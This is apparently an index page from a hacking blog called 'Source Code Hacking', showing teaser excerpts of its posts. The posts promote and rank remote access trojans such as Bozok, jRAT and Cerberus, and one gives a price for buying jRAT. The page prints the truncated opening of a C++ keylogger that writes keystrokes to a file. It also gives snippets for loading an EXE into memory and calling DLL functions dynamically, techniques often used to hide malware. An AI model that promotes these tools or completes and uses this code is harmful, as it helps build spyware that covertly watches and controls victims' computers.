Bozok RAT (fastest RAT)

this is also Delphi coded one and it is most fastest RAT ever made. it has  same features like other RATs but fast than others. every functions are fast in this rat. Advantages: Coded in Delphi fast  No need framework Server small and plugin separated...

read more

jRAT v5 Java Remote Administration (Best Java RAT 2016)

jRAT is promoted as a cross-platform Remote Administration Tool written in Java. For only 40$, one can buy the tool. The tool enables a customer/administrator to generate custom JAR files that gives him the possibility to remotely control a PC via a graphical user interface...

read more

C++ keylogger

#include <tchar.h> #include <windows.h> #include <iostream> #include <windows.h> #include <winuser.h> #include <fstream> int Save(int out) { ofstream fout("abc.txt",ios::app); if (out==9) fout<<"\nTAB\n"; else if (out==32) fout<<' '; else if (out==13) fout<<'\n'; else if (out==16) fout<<"\nSHIFT\n"; else if (out>=48&&out<=59) fout<<out-48; else if (out>=65&&out<=90) fout<<char(tolower(out)); fout.close(); } int...

read more

Best RAT Software tested 2016

01. Cerberus RAT These days this RAT is not popular but it is working all new Windows OS. Cerberus  is the best, it is stable and simple and powerful. Cerberus RAT is the most stable ,most effective RAT ever used by me. It has small server...

read more

VB.Net EXE Run It from Memory

First Step Load the EXE file in one stream and read it as an array of bytes: Hide   Copy Code // read the bytes from the application EXE file FileStream fs = new FileStream(filePath, FileMode.Open); BinaryReader br = new BinaryReader(fs); byte[] bin = br.ReadBytes(Convert.ToInt32(fs.Length)); fs.Close(); br.Close();...

read more

Vb.net DynamicAPI class to invoke Dll methods

Class module: NotInheritable Class DynamicAPI#Region "API"    <Runtime.InteropServices.DllImport("kernel32.dll", SetLastError:=True)> Private Shared Function LoadLibrary(ByVal lpFileName As String) As IntPtr    End Function    <Runtime.InteropServices.DllImport("kernel32.dll", SetLastError:=True, CharSet:=Runtime.InteropServices.CharSet.Ansi, ExactSpelling:=True)> Private Shared Function GetProcAddress(ByVal hModule As IntPtr, ByVal procName As String) As IntPtr    End Function    <Runtime.InteropServices.DllImport("kernel32.dll", SetLastError:=True,...

read more

VB.Net call method from DLL

your code in Test.dll Public Module Class1     Public Sub Show()         MsgBox("It works", MsgBoxStyle.Information, "Success")     End Sub End Module use the following code to run: Dim assem As System.Reflection.Assembly = Assembly.LoadFrom("Testdll.dll") Dim ty As Type = assem.GetType("Testdll.Class1") Dim...

read more

Copyright © Source Code Hacking. Designed by Momizat Team. Powered to Blogger by SpicyTweaks.

Scroll to top